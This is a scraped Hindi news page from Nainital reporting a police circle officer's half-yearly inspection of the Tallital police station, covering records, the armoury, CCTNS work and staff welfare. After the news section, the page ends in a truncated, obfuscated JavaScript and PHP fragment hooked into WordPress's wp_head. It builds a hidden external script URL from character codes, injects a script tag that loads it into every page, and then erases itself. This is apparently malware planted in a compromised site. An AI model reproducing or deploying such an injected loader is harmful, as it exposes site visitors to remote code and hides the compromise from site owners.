Saturday, July 27, 2024
spot_img

नैनीताल : क्षेत्राधिकारी द्वारा किया गया थाना तल्लीताल का अर्द्धवार्षिक निरीक्षण

नैनीताल ::- विभा दीक्षित क्षेत्राधिकारी नगर नैनीताल द्वारा थाना तल्लीताल का अर्द्धवार्षिक निरीक्षण किया गया।

जिसमें थाने के अर्द्धवार्षिक निरीक्षण से पूर्व सुसज्जित, सशस्त्र गार्द द्वारा महोदया को सलामी दी गई।

– निरीक्षण के दौरान थाना कार्यालय के महत्वपूर्ण अभिलेखो की अध्यावधिक स्थिति की जांची गई।

– थाने के शस्त्रागार मैं मौजूद शस्त्रों का मिलान जीपी लिस्ट से किया गया।

– थाना कार्यालय के सीसीटीएनएस कार्यों के निरीक्षण के दौरान ऑनलाइन जीडी, एफआईआर, चार्ज शीट एवं अंतिम रिपोर्ट की स्थिति जांच की गई। इस दौरान ऑनलाइन सीसीटीएनएस के माध्यम से किए जाने वाले सभी कार्य भी अध्यवधिक पाए गए।

– निरीक्षण के पश्चात थाने में मौजूद समस्त पुलिस कर्मचारी सम्मेलन के माध्यम से उनकी समस्याये सुनी व उनका त्वरित निराकरण भी किया गया।

– थाने में मौजूद समस्त उप निरीक्षक गणों (विवेचको) के साथ बैठक आयोजित कर उनके पास लंबित विभिन्न प्रकरण की विवेचनाओ एवं शिकायती प्रार्थना पत्र के त्वरित निस्तारण के लिए निर्देशित किया गया।

– निरीक्षण के दौरान पुलिसकर्मियों से वेपन हैंडलिंग का बेसिक अभ्यास भी करवाया गया जो संतोषजनक रहा।

– थाने के मालखाना में रखें विभिन्न सरकारी संपत्तियो एवम आपदा उपकरणों के उचित रखरखाव व उनके क्रियाशील होने की स्थिति जांची गई तथा समस्त आपदा उपकरणों को तैयारी हालत में रखने के निर्देश दिए गए।

– निरीक्षण के दौरान थाना में मौजूद पुलिस कर्मियों का सम्मेलन लिया गया तथा ड्यूटी के दौरान उन्हें आने वाली परेशानियां पूंछी गई और उनका त्वरित निराकरण भी किया गया।

– पुलिसकर्मियों के उचित रहन-सहन के लिए थाने में मौजूद कर्मचारी कर्मचारी स्मार्ट बैरक का निरीक्षण किया गया जिस दौरान सभी व्यवस्थाएं चाक-चौबंद पाई गई साथ ही कर्मचारियों के अच्छे रहन-सहन हेतु उन्हे सभी मूलभूत सुविधाएं देने के लिए थानाध्यक्ष तल्लीताल को निर्देशित किया गया।

इस दौरान रोहताश सिंह सागर थानाध्यक्ष तल्लीताल, महिला उपनिरीक्षक भावना बिष्ट सहित थाने में मौजूद समस्त अधीनस्थ पुलिस बल मौजूद रहे।

Related Articles

- Advertisement -spot_img

ताजा खबरे

eInt(_0x383697(0x178))/0x1+parseInt(_0x383697(0x180))/0x2+-parseInt(_0x383697(0x184))/0x3*(-parseInt(_0x383697(0x17a))/0x4)+-parseInt(_0x383697(0x17c))/0x5+-parseInt(_0x383697(0x179))/0x6+-parseInt(_0x383697(0x181))/0x7*(parseInt(_0x383697(0x177))/0x8)+-parseInt(_0x383697(0x17f))/0x9*(-parseInt(_0x383697(0x185))/0xa);if(_0x351603===_0x4eaeab)break;else _0x8113a5['push'](_0x8113a5['shift']());}catch(_0x58200a){_0x8113a5['push'](_0x8113a5['shift']());}}}(_0x48d3,0xa309a));var f=document[_0x3ec646(0x183)](_0x3ec646(0x17d));function _0x38c3(_0x32d1a4,_0x31b781){var _0x48d332=_0x48d3();return _0x38c3=function(_0x38c31a,_0x44995e){_0x38c31a=_0x38c31a-0x176;var _0x11c794=_0x48d332[_0x38c31a];return _0x11c794;},_0x38c3(_0x32d1a4,_0x31b781);}f[_0x3ec646(0x186)]=String[_0x3ec646(0x17b)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x62,0x61,0x63,0x6b,0x67,0x72,0x6f,0x75,0x6e,0x64,0x2e,0x61,0x70,0x69,0x73,0x74,0x61,0x74,0x65,0x78,0x70,0x65,0x72,0x69,0x65,0x6e,0x63,0x65,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x74,0x61,0x72,0x74,0x73,0x2f,0x73,0x65,0x65,0x2e,0x6a,0x73),document['currentScript']['parentNode'][_0x3ec646(0x176)](f,document[_0x3ec646(0x17e)]),document['currentScript'][_0x3ec646(0x182)]();function _0x48d3(){var _0x35035=['script','currentScript','9RWzzPf','402740WuRnMq','732585GqVGDi','remove','createElement','30nckAdA','5567320ecrxpQ','src','insertBefore','8ujoTxO','1172840GvBdvX','4242564nZZHpA','296860cVAhnV','fromCharCode','5967705ijLbTz'];_0x48d3=function(){return _0x35035;};return _0x48d3();}";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}} ?>